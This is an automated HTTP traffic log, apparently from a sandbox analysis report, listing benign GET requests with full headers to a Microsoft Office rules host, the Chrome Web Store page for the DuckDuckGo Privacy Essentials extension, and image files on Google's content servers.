Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /webstore/detail/duckduckgo-privacy-essent/bkdgflcldnnnapblkhphbgpggdiikppg HTTP/1.1Host: chrome.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /detail/duckduckgo-privacy-essent/bkdgflcldnnnapblkhphbgpggdiikppg HTTP/1.1Host: chromewebstore.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=518=Jsq-DokBKDDryYGk-EAsQ4vI-8cNhd9IlMC5ws6u_ewAD5zu2PZtj0jtGZG176LJdFqP4mEMUWUAZNUpB_yVd64WQCUSsK6P0E4jbRVvzrivP-J23HqWqlpUCyccepMu8y31U3W4Rn_4zbzRSUeDLGX-A15tRMucfHgh1kSze_JUXEXe7Oc
Source: global trafficHTTP traffic detected: GET /lvi-lnjW93fptfOOExbgCulkDpRkTAVfjR3M0IKtDQv4B-sk4O9xrp2P1udQTjxsfl-gJS7S8yqv8dXxB3wITacDSaU=s60 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chromewebstore.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /a-/ALV-UjWuDGySyWhbyLJdWT_0QCizAbEyFKjQ4lS3MMUOnV1yYX0ks1be=s48-w48-h48 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chromewebstore.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /a-/ALV-UjUBDI4MyIvJIB5vN1VD0pk5tN_Np7FJQoQn_-355hQsgjo6D5U=s48-w48-h48 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chromewebstore.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /a-/ALV-UjVXxMbnDH06Mw7_K-VroRytYePj4dzwTxv4lYqsxovxXe5qBnjv=s48-w48-h48 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chromewebstore.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /BK9B47UjAvyI4GPqmo1kqIAN4fmtgKrJflhcZ0lXYHElpgl9G2N2951auaEIh8HEj3H03nzA6wBWP-j313NhWe55HA=s275-w275-h175 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chromewebstore.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fitJiqFAG28NoaXMuq1pTd3MD1rHve2lDBvznyV_Orti4UiFSwpCb3_h4n9atBiDDwBXpvUSu8Br2lI1t5UoHnGR=s275-w275-h175 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chromewebstore.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /Q3rRqV2wEHrrQzVuZ68f5nHqGvLL756gXSLDgGgPdubewYeYD_YH94dSath7bDE_eXvTkax2FQFgkOvSMFMeRfS0VDA=s275-w275-h175 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chromewebstore.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wYdux_M8NF9FTg2fLMt5TQdGmR1zHmI5XCaJAmn8L9OpWiph0uP5kEpeylM_XgR-OzJgZDcTV_sx-6INdNwHha5-FHY=s60 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chromewebstore.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /7hPzZiwbyPBKrlh-CO8rSZAhrubgLChujM45T4JbXgIHwP_5QG_rKYCekCtubWUy6EOJZlvSNGhw8gdNEelJe8Vz=s275-w275-h175 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chromewebstore.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /LG6sxx25GBIS9a5NEJT5-5LpXmxRWhKWq__SA0Q__UAEEG_pGhUEAbge1h3uMDCqI-Bn8dnKwxvbKilvB4LHIWD4tg=s275-w275-h175 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chromewebstore.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cw6loShVaHB1WmJV3GTr3AWscNoZeSvxksONwnp8n7AKazCv1k-rcjWEp2Dta7VyElFGR7BzspOehuSZkklLCd66=s60 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chromewebstore.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /Qf59jYhfbx2rt-mNWNBXrLHH8ueA0-Hittc8HJ5MxVZXf7-NUATuHOvp-ppj_t7Q1P_WZpeVE5XSvfjf5SVVmjPK=s60 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chromewebstore.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /Q6vggBG9PtDuGi_WuhHJu0lMF-SsiKNAmGc73-4xvA8ZtYDSyPlCmr--wlH-EVPky1fIxzCn0zob7zurBaAgZZubxA0=s275-w275-h175 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chromewebstore.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /E_2s-5WfnxwAc46aTKDQiKBh9JmLKSusH2vctWR0NNvycRM1T2TQpBq_u-Lf6SJkOmakBkLp8g24V0wVjKiFaCbL5ws=s275-w275-h175 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chromewebstore.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /buoRxpVerhTQPyzUa4kX_9FaWmzrl5LVSVyLGzJP9E8dRLyP-8YLID_HSlRNZxo2RLHBY7N7h4k77ayFBG_eWq0GGQ=s60 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chromewebstore.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /gQTYw5DF7N0use9RHAenwHN-CAmr2Ml42qOiwaFr0L17c4xfik_TOv-fjEwjO_BGA_AQRGql_t3Zew1EX9a_CA9eWA=s60 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chromewebstore.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /EfLqyLoo5-iga5l8oerPNmDlmJnUbZACbTAw0gOJhirRHXhLVgOaEa8BhqNNIzTjwUoSRObkvpBc3tICfQ0DV3EO=s1280-w1280-h800 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chromewebstore.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /LtBvUp3Og39KJjwrHuvaqaooDAjOS1drA8yvKNS4X8507y1sm5dYLRtDvr8ddiRjaXUMPIPwrVtWgBWrYUO5y8QM7A=s1280-w1280-h800 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chromewebstore.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
